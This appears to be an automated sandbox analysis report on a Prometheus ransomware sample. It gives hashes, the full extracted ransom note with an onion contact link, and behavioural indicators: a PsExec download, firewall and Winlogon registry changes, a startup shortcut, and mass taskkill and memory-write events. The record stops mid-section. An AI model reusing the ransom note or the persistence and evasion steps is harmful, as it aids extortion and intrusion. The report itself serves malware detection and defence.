prometheus | e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3

Resubmissions

13-08-2024 05:39

240813-gcg68swhqg 10

28-05-2021 06:53

210528-9sn3jdwaa2 10

Analysis

max time kernel
150s
max time network
150s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Size

290KB
MD5

a6dcf23059f6e61fa683907c47baf73e
SHA1

1d55396b26d97b18256513607dcbe3f308569d5b
SHA256

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3
SHA512

72ef9997b814807e677e7861a94de3c8c2b7cb350ab79c887de61f505f23ebc2e3db177b34e86f1dedb3017f468e5c6c0f34d188c574e4cbe20410ff1bf596f7

Score

10^/10

prometheus discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install it. 3. Open the Tor browser. Copy the link http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD and paste it in the Tor browser. 7. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: p8xndoRM85vhClDsZEqHUqfsHCV6n66jvsrftpClmFASspxlkRD1kRNMzqDNgidp8fuaq3XHnuzwimf2U1cwNg3rqx3DVzmG0qOvA326lCnZMFD1/WWkR2UEHFxCsJJ0aD228aDtom1KdyTupRx0GnYzyYCyomgvsgF7FIsFIbXX7Wy6UtO926qPNk28CSDUIga19rPRXwHk4U7OGpeYzN1rXYVWCeZKPTKPIMzpw2R5NuW+uR4yaPqC0C+zf1dfZtN8KuhEo4+lN/tO9oVHZnh28+4zGAtP8pnIgc/0QT4l5yRZhSArLbmpIxyO3NY5RnS4/SYj846jc7kmYIo5FsTlTpzh3XKOB/SbKqX2iHzMoJNh1JdCo+aleQZsVKjwuOtTzT9QAm9K5qupA06dI8Hs0vQRcS4swYNpMqmqEQmW890T0TWdwoShJSE7ry37sjvyQRvKKUHTgt4fkh11zLYi1kZ9r/JjYH3S1L+wLbSBK7Vh1jcHsUrp51da41e3a8p7oRxUcrinouXCSpU5lsJWvG1m1zgandSizJts/hUaHCcfvPC3SmY4qkaUZXrBFQlQZp7COcgLzgOjyLW3Rh54MCdBgn2YiPXUzh+B6rWPNUDjImPBkHkTckfDhZj4OicpEq6Z2OOW5HzTAZ7F55/977uvU9vWclaDglyn7Qs=

URLs

http://promethw27cbrcot.onion/ticket.php?track=AA4-MX4-GGQD

Signatures

Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 15 http://live.sysinternals.com/PsExec64.exe
Executes dropped EXE 1 IoCs

Processes:

qy5ts0jh.exe

pid process

4896 qy5ts0jh.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	15	http://live.sysinternals.com/PsExec64.exe

pid	process
4896	qy5ts0jh.exe

Drops startup file 1 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

4372 icacls.exe
4584 icacls.exe
4432 icacls.exe

pid	process
4372	icacls.exe
4584	icacls.exe
4432	icacls.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1240	taskkill.exe
848	taskkill.exe
4620	taskkill.exe
4844	taskkill.exe
5036	taskkill.exe
5100	taskkill.exe
3376	taskkill.exe
4064	taskkill.exe
2656	taskkill.exe
3396	taskkill.exe
4392	taskkill.exe
4256	taskkill.exe
2200	taskkill.exe
4336	taskkill.exe
1252	taskkill.exe
2876	taskkill.exe
4260	taskkill.exe
4900	taskkill.exe
3524	taskkill.exe
2588	taskkill.exe
2548	taskkill.exe
4204	taskkill.exe
1928	taskkill.exe
4208	taskkill.exe
4400	taskkill.exe
4104	taskkill.exe
2168	taskkill.exe
4016	taskkill.exe
3536	taskkill.exe
3440	taskkill.exe
3788	taskkill.exe
3576	taskkill.exe
4300	taskkill.exe
4372	taskkill.exe
4576	taskkill.exe
1868	taskkill.exe
1952	taskkill.exe
4444	taskkill.exe
3756	taskkill.exe
4164	taskkill.exe
4108	taskkill.exe
4556	taskkill.exe
4712	taskkill.exe
2100	taskkill.exe
3568	taskkill.exe
212	taskkill.exe
2608	taskkill.exe
4948	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3488 reg.exe
Runs net.exe

pid	process
3488	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

pid	process
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exenetsh.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeicacls.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	2608	taskkill.exe
Token: SeDebugPrivilege	3568	taskkill.exe
Token: SeDebugPrivilege	3376	taskkill.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	212	netsh.exe
Token: SeDebugPrivilege	3396	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	4016	taskkill.exe
Token: SeDebugPrivilege	3440	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	1928	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	848	taskkill.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	4108	taskkill.exe
Token: SeDebugPrivilege	4164	taskkill.exe
Token: SeDebugPrivilege	4208	taskkill.exe
Token: SeDebugPrivilege	4260	taskkill.exe
Token: SeDebugPrivilege	4300	taskkill.exe
Token: SeDebugPrivilege	4372	icacls.exe
Token: SeDebugPrivilege	4392	Conhost.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4556	taskkill.exe
Token: SeDebugPrivilege	4576	taskkill.exe
Token: SeDebugPrivilege	4620	taskkill.exe
Token: SeDebugPrivilege	4712	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	4948	taskkill.exe
Token: SeDebugPrivilege	5036	taskkill.exe
Token: SeDebugPrivilege	5100	taskkill.exe
Token: SeDebugPrivilege	3524	taskkill.exe
Token: SeDebugPrivilege	2588	taskkill.exe
Token: SeDebugPrivilege	2100	taskkill.exe
Token: SeDebugPrivilege	3536	taskkill.exe
Token: SeDebugPrivilege	2548	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4400	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	4324	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

pid process

3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

pid process

3368 e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe

description	pid	process	target process
PID 3368 wrote to memory of 1252	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1252	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3372	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	reg.exe
PID 3368 wrote to memory of 3372	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	reg.exe
PID 3368 wrote to memory of 3488	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	reg.exe
PID 3368 wrote to memory of 3488	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	reg.exe
PID 3368 wrote to memory of 1264	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	schtasks.exe
PID 3368 wrote to memory of 1264	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	schtasks.exe
PID 3368 wrote to memory of 2200	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	cmd.exe
PID 3368 wrote to memory of 2200	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	cmd.exe
PID 3368 wrote to memory of 3944	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 3944	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 1748	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 1748	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 2120	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 2120	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 2648	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	cmd.exe
PID 3368 wrote to memory of 2648	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	cmd.exe
PID 3368 wrote to memory of 1596	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 1596	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 4000	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 4000	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 3364	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 3364	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 2168	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 2168	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 1848	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 1848	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	sc.exe
PID 3368 wrote to memory of 3200	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe
PID 3368 wrote to memory of 3200	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe
PID 3368 wrote to memory of 2876	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 2876	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 2656	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 2656	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 2608	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 2608	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3376	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3376	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3568	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3568	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1868	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1868	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3756	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3756	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 212	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe
PID 3368 wrote to memory of 212	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe
PID 3368 wrote to memory of 3396	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3396	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1952	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1952	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 4064	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 4064	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 4016	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 4016	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3440	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3440	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1240	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1240	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1928	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 1928	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3788	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3788	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	taskkill.exe
PID 3368 wrote to memory of 3872	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe
PID 3368 wrote to memory of 3872	3368	e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.exe	netsh.exe

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

Processes:

